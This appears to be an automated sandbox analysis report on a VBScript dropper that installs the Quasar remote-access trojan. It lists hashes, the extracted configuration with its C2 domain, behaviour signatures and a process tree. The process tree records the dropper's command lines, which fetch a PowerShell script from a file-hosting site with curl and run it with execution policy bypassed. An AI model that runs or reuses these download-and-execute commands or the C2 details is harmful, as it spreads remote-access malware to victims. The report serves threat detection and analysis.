Analysis
max time kernel: 160s
max time network: 208s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
submitted: 16/01/2023, 07:46
Static task: static1
Behavioral task: behavioral1
Sample: vb.vbs
Resource: win7-20221111-en
General
Target: vb.vbs
Size: 1024KB
MD5: ea33785b5feaade952b2768dc1b74d6d
SHA1: 2611ef2ca512873963550e03e8da3761a3f827da
SHA256: 664e3869703282407878479b644155607546c786f69cac5718055005c34b8c82
SHA512: 63745e2ee17ab5cca44eb46c5e7faecc7d2e38831d87c61262d9f4fb8d55d3891d1d9f49443dc07825273c5ca973ab3f6e964b1dae2191fd0cd306cf8a7fae35
SSDEEP: 12:O+h3awpefnYj5H6NPnqkc+h3awpeZ9nF6NPnJ:O+9xYM5wqh+9xYZly
Malware Config
Extracted
Family: quasar
Version: 1.4.0
Botnet: Office04
C2: ghcc.duckdns.org:4782
Mutex: a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b
encryption_key: B0326395AC2D48856CAE22978A087DF5DCF5816D
install_name: Client.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: Quasar Client Startup
subdirectory: SubDir
Signatures

Quasar payload (2 IoCs)
resource / yara_rule:
  behavioral2/memory/1644-141-0x0000000000400000-0x0000000000484000-memory.dmp  family_quasar
  behavioral2/memory/1644-142-0x000000000047E7AE-mapping.dmp  family_quasar

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
description / ioc / Process:
  Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation  WScript.exe

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow / ioc:
  44  api.ipify.org
  45  api.ipify.org

Suspicious use of SetThreadContext (1 IoCs)
description / pid / Process / procid_target:
  PID 4628 set thread context of 1644  4628  powershell.exe  87

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid / Process:
  4628  powershell.exe
  4628  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
description / pid / Process:
  Token: SeDebugPrivilege  4628  powershell.exe
  Token: SeDebugPrivilege  1644  RegAsm.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
pid / Process:
  1644  RegAsm.exe

Suspicious use of WriteProcessMemory (20 IoCs)
description / pid / Process / procid_target:
  PID 4496 wrote to memory of 4828  4496  WScript.exe  79
  PID 4496 wrote to memory of 4828  4496  WScript.exe  79
  PID 4828 wrote to memory of 4780  4828  cmd.exe  81
  PID 4828 wrote to memory of 4780  4828  cmd.exe  81
  PID 4780 wrote to memory of 4792  4780  cmd.exe  82
  PID 4780 wrote to memory of 4792  4780  cmd.exe  82
  PID 4496 wrote to memory of 4584  4496  WScript.exe  83
  PID 4496 wrote to memory of 4584  4496  WScript.exe  83
  PID 4584 wrote to memory of 1996  4584  cmd.exe  85
  PID 4584 wrote to memory of 1996  4584  cmd.exe  85
  PID 1996 wrote to memory of 4628  1996  cmd.exe  86
  PID 1996 wrote to memory of 4628  1996  cmd.exe  86
  PID 4628 wrote to memory of 1644  4628  powershell.exe  87
  PID 4628 wrote to memory of 1644  4628  powershell.exe  87
  PID 4628 wrote to memory of 1644  4628  powershell.exe  87
  PID 4628 wrote to memory of 1644  4628  powershell.exe  87
  PID 4628 wrote to memory of 1644  4628  powershell.exe  87
  PID 4628 wrote to memory of 1644  4628  powershell.exe  87
  PID 4628 wrote to memory of 1644  4628  powershell.exe  87
  PID 4628 wrote to memory of 1644  4628  powershell.exe  87
Processes
(process tree; indentation shows parent/child depth)

1  C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"
   PID: 4496
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory

  2  C:\Windows\System32\cmd.exe
     Command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
     PID: 4828
     - Suspicious use of WriteProcessMemory

    3  C:\Windows\system32\cmd.exe
       Command line: cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
       PID: 4780
       - Suspicious use of WriteProcessMemory

      4  C:\Windows\system32\curl.exe
         Command line: curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
         PID: 4792

  2  C:\Windows\System32\cmd.exe
     Command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
     PID: 4584
     - Suspicious use of WriteProcessMemory

    3  C:\Windows\system32\cmd.exe
       Command line: cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
       PID: 1996
       - Suspicious use of WriteProcessMemory

      4  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
         PID: 4628
         - Suspicious use of SetThreadContext
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory

        5  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
           Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
           PID: 1644
           - Suspicious use of AdjustPrivilegeToken
           - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 5.1MB
MD5: 7aad8bcb11ff3deab23cc311222fe265
SHA1: 3d9a69c71e00aff947af949441220f18bad9e0d8
SHA256: c90652e3d658848ea93fc3b70bec8122366ea3a9cc79a11cd47d7b5c418b9b2a
SHA512: f6bb4fd8ffab5b08ed8c0991e8c57d91702cbfc6034e7157c720c5b94b55f88788a4273c9ec46e63ac0c286f24ff4ad17e925074f6766a5fab53eb4959728fe9